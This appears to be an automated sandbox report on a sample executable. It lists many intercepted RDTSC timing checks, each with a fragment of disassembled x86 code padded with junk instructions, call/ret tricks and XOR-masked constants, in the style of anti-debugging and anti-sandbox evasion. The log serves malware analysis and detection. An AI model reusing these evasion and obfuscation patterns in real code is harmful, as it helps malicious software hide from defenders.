Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71989A second address: 7198A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7198A0 second address: 7198F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jl 00007F9498E4A77Eh 0x00000012 push edx 0x00000013 jnc 00007F9498E4A776h 0x00000019 pop edx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push edi 0x0000001f jo 00007F9498E4A778h 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 mov eax, dword ptr [eax] 0x0000002a jmp 00007F9498E4A788h 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7198F6 second address: 7198FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719A26 second address: 719A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719A2B second address: 719A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE56Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719A4A second address: 719A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9498E4A77Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719A58 second address: 719AAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F94990FE568h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 jmp 00007F94990FE570h 0x00000028 push 00000000h 0x0000002a jns 00007F94990FE56Ch 0x00000030 push 026ED66Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jns 00007F94990FE566h 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719AAE second address: 719AB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9498E4A77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719AB8 second address: 719B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 026ED6ECh 0x0000000d mov cx, si 0x00000010 and si, E42Ah 0x00000015 push 00000003h 0x00000017 movzx edi, ax 0x0000001a mov dword ptr [ebp+12449AAFh], ecx 0x00000020 push 00000000h 0x00000022 pushad 0x00000023 jno 00007F94990FE568h 0x00000029 mov bh, 09h 0x0000002b popad 0x0000002c push 00000003h 0x0000002e mov edx, dword ptr [ebp+122D366Fh] 0x00000034 push A4D1DC95h 0x00000039 jmp 00007F94990FE576h 0x0000003e xor dword ptr [esp], 64D1DC95h 0x00000045 cld 0x00000046 lea ebx, dword ptr [ebp+1244B446h] 0x0000004c mov ecx, 2C0ABDE2h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jo 00007F94990FE566h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719B28 second address: 719B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72C9BA second address: 72C9D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72C9D6 second address: 72C9E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9498E4A776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A23E second address: 73A242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A242 second address: 73A29B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F9498E4A77Ch 0x0000000e je 00007F9498E4A776h 0x00000014 pushad 0x00000015 jc 00007F9498E4A791h 0x0000001b jmp 00007F9498E4A785h 0x00000020 jnp 00007F9498E4A776h 0x00000026 push eax 0x00000027 pushad 0x00000028 popad 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9498E4A785h 0x00000033 jl 00007F9498E4A776h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738829 second address: 73882D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73882D second address: 738855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A787h 0x00000007 jmp 00007F9498E4A77Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738855 second address: 7388A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Bh 0x00000007 jmp 00007F94990FE56Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F94990FE579h 0x00000015 jng 00007F94990FE57Bh 0x0000001b jmp 00007F94990FE575h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7388A7 second address: 7388AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7388AF second address: 7388C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7388C6 second address: 7388D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73909D second address: 7390BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F94990FE56Ch 0x0000000e pushad 0x0000000f jnp 00007F94990FE566h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7393A3 second address: 7393A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7393A7 second address: 7393C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE573h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7393C6 second address: 7393CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7393CA second address: 7393CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739990 second address: 7399A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F9498E4A77Eh 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739B08 second address: 739B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739B15 second address: 739B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9498E4A77Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739B28 second address: 739B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739DC7 second address: 739DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 739DCB second address: 739DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A0ED second address: 73A0F7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9498E4A782h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73D408 second address: 73D40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740ABA second address: 740ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740ABF second address: 740AE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jnl 00007F94990FE580h 0x0000000e jmp 00007F94990FE574h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745165 second address: 745169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745592 second address: 745596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 745596 second address: 74559A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746DE6 second address: 746DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F94990FE566h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746DF5 second address: 746DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74700E second address: 747012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747012 second address: 747021 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747021 second address: 747027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747027 second address: 74702B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747339 second address: 74733D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7473D2 second address: 7473EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F9498E4A77Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jl 00007F9498E4A77Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747A08 second address: 747A0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747A0D second address: 747A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F9498E4A776h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747A24 second address: 747A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747A28 second address: 747A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F9498E4A778h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov si, di 0x00000025 nop 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F9498E4A788h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747A74 second address: 747A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747EF9 second address: 747F03 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9498E4A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 748574 second address: 74860C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F94990FE568h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jnl 00007F94990FE56Ch 0x00000028 push 00000000h 0x0000002a sub esi, dword ptr [ebp+122D1CC8h] 0x00000030 mov di, 14B9h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F94990FE568h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov edi, 23396DA5h 0x00000055 call 00007F94990FE56Eh 0x0000005a mov si, 6750h 0x0000005e pop esi 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 jmp 00007F94990FE577h 0x00000068 push edx 0x00000069 pop edx 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74860C second address: 74862F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9498E4A780h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74862F second address: 748634 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A117 second address: 74A11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A11D second address: 74A138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F94990FE56Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A138 second address: 74A146 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9498E4A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74AAB9 second address: 74AAC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F94990FE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74AAC3 second address: 74AB03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F9498E4A776h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9498E4A77Bh 0x00000014 nop 0x00000015 call 00007F9498E4A782h 0x0000001a clc 0x0000001b pop esi 0x0000001c movzx edi, si 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 pushad 0x00000024 adc bl, 00000021h 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74AB03 second address: 74AB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE577h 0x00000009 popad 0x0000000a jp 00007F94990FE56Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74BE48 second address: 74BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74CB88 second address: 74CBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F94990FE568h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 and esi, 3FC4896Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d movzx edi, dx 0x00000030 push eax 0x00000031 jl 00007F94990FE574h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74CBC9 second address: 74CBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74D694 second address: 74D708 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F94990FE57Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jg 00007F94990FE56Ch 0x00000012 pop ebx 0x00000013 nop 0x00000014 mov edi, ebx 0x00000016 push 00000000h 0x00000018 mov di, F3E3h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F94990FE568h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov esi, ebx 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c push edx 0x0000003d jns 00007F94990FE566h 0x00000043 pop edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F94990FE566h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F62C second address: 74F631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F631 second address: 74F637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74DECE second address: 74DED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F637 second address: 74F647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F94990FE56Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74DED4 second address: 74DED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F647 second address: 74F650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74F650 second address: 74F65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9498E4A776h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7535DE second address: 7535E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7535E3 second address: 753614 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9498E4A78Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F9498E4A77Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753B75 second address: 753BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F94990FE566h 0x0000000a popad 0x0000000b pop edi 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F94990FE568h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2B49h] 0x0000002d push 00000000h 0x0000002f js 00007F94990FE56Ch 0x00000035 mov dword ptr [ebp+122D2AA5h], edx 0x0000003b mov edi, dword ptr [ebp+122D386Bh] 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F94990FE568h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d mov dword ptr [ebp+122D5613h], eax 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F94990FE573h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754BB4 second address: 754BC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753D92 second address: 753D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754BC5 second address: 754C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D1BA3h], ebx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F9498E4A778h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov ebx, ecx 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754C0A second address: 754C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754C11 second address: 754C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F9498E4A776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756CBA second address: 756CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754D93 second address: 754D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9498E4A776h 0x0000000a rdtsc
